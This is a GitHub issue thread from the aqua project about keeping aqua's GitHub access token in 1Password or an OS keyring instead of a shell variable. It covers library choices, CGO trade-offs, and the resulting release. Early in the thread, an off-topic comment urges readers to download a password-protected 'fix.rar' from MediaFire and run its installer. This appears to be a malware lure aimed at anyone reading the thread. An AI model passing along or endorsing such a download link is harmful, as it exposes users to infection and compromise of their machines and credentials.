### ISSUE TITLE
1Password CLI Shell Plugin

### ISSUE THREAD

**Issue by nikolay** [aquaproj/aqua#3068]
### Feature Overview

https://developer.1password.com/docs/cli/shell-plugins/contribute/

### Why is the feature needed?

Otherwise, the `AQUA_GITHUB_TOKEN` or `GITHUB_TOKEN` should always be set and exposed in the shell.

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by suzuki-shunsuke** [comment]
Thank you for your proposal.
I'm not familiar with 1Password CLI Shell Plugin, but this issue means installing 1Password CLI Shell Plugin via aqua?
I'll look into how to install plugins.

aqua doesn't support some plugin mechanism, so I'm not sure if aqua can support 1Password CLI Shell Plugin.
https://aquaproj.github.io/docs/products/aqua-registry/contributing#aqua-cant-support-some-tools-plugin-mechanism

**Comment by suzuki-shunsuke** [comment]
I read the document of 1Password CLI Shell Plugin, but I'm not sure what aqua should do.
We need more details.

**Comment by suzuki-shunsuke** [comment]
Oh, I see!
This issue means the 1Password CLI Shell Plugin for aqua, which passes GitHub access token to aqua via 1Password.

**Comment by nikolay** [comment]
Yeah, @suzuki-shunsuke, sorry for not being clear. I guess, you support `AQUA_GITHUB_TOKEN` - I would say it makes sense to pass that and not the generic `GITHUB_TOKEN`.

**Comment by suzuki-shunsuke** [comment]
I'm concern about the overhead of the plugin.
I'm not sure about the detail of the plugin, but if the plugin is executed every time aqua is executed, maybe the overhead affects the user experience.
When you execute tools installed by aqua, aqua is executed.

On the other hand, the plugin would improve the security, and the performance should be measured rather than imagined.

**Comment by suzuki-shunsuke** [comment]
> I'm not sure about the detail of the plugin, but if the plugin is executed every time aqua is executed, maybe the overhead affects the user experience.

If aqua supports the lazy load of a GitHub access token, this issue would be solved.
`lazy load` means aqua loads a GitHub access token only when aqua really needs it.

**Comment by suzuki-shunsuke** [comment]
I found an interesting library.
It would be nice if aqua can get GitHub Access token from not only 1Password but also other secret stores.
https://github.com/99designs/keyring

**Comment by nikolay** [comment]
@suzuki-shunsuke Yes, that library is used by the famous https://github.com/99designs/aws-vault and https://github.com/common-fate/granted and although there are some more actively developed equivalents, the one you mention is the only one in Go supporting Windows.

**Comment by suzuki-shunsuke** [comment]
https://github.com/99designs/keyring The last update was two years ago.
https://github.com/keybase/go-keychain : For macOS keychain
https://github.com/zalando/go-keyring : This is actively maintained and supports Windows
https://github.com/danieljoos/wincred : Go wrapper around the Windows Credential Manager API functions

**Comment by suzuki-shunsuke** [comment]
99designs/keyring works well on macOS.

https://gist.github.com/suzuki-shunsuke/58961369fbe13c76b3052c6ddc0a3893

## Usage

```console
$ aqua token set [-stdin]
> ***
$ aqua token remove
$ aqua token get # optional
```

**Comment by suzuki-shunsuke** [comment]
Hmm. 99designs/keyring doesn't work on macOS without CGO.

```sh
CGO_ENABLED=0 go build -o bin/get-nocgo get.go
```

```console
$ ./bin/get-nocgo 
2024/10/11 16:12:22 set a key: No directory provided for file keyring
```

https://gist.github.com/suzuki-shunsuke/58961369fbe13c76b3052c6ddc0a3893?permalink_comment_id=5230278#gistcomment-5230278

**Comment by suzuki-shunsuke** [comment]
https://github.com/zalando/go-keyring/issues/64#issuecomment-1793669498 describes the pros and cons of CGO well.
It's hard to make a decision.
We don't want to depend on CGO, but access to macOS keychain via CGO is securer.

**Comment by suzuki-shunsuke** [comment]
📝 GitHub CLI uses zalando/go-keyring.

https://github.com/cli/cli/blob/b91dab44566a44e5f8e43c0cc83724e574320536/go.mod#L45

**Comment by suzuki-shunsuke** [comment]
📝 1Password has a SDK for Go.

https://github.com/1Password/onepassword-sdk-go

**Comment by suzuki-shunsuke** [comment]
Hi @nikolay , sorry to bother you.
Do you usually use Linux or Windows?
If so, could you help us verify the feature https://github.com/aquaproj/aqua/pull/3174 ?
I usually use macOS so it's difficult to verify the feature on Linux and Windows.

- https://github.com/aquaproj/aqua/issues/3178

**Comment by nikolay** [comment]
@suzuki-shunsuke No, I'm only on macOS, but I can try on Linux and Windows as well.

**Comment by suzuki-shunsuke** [comment]
Thank you!

**Comment by suzuki-shunsuke** [comment]
This isn't related to 1Password, but you can now manage a GitHub Access token using secret store such as [Windows Credential Manager](https://support.microsoft.com/en-us/windows/accessing-credential-manager-1b5c916a-6a16-889f-8581-fc16e8165ac0), [macOS Keychain](https://en.wikipedia.org/wiki/Keychain_(software)), and [GNOME Keyring](https://wiki.gnome.org/Projects/GnomeKeyring).

https://github.com/aquaproj/aqua/releases/tag/v2.51.1
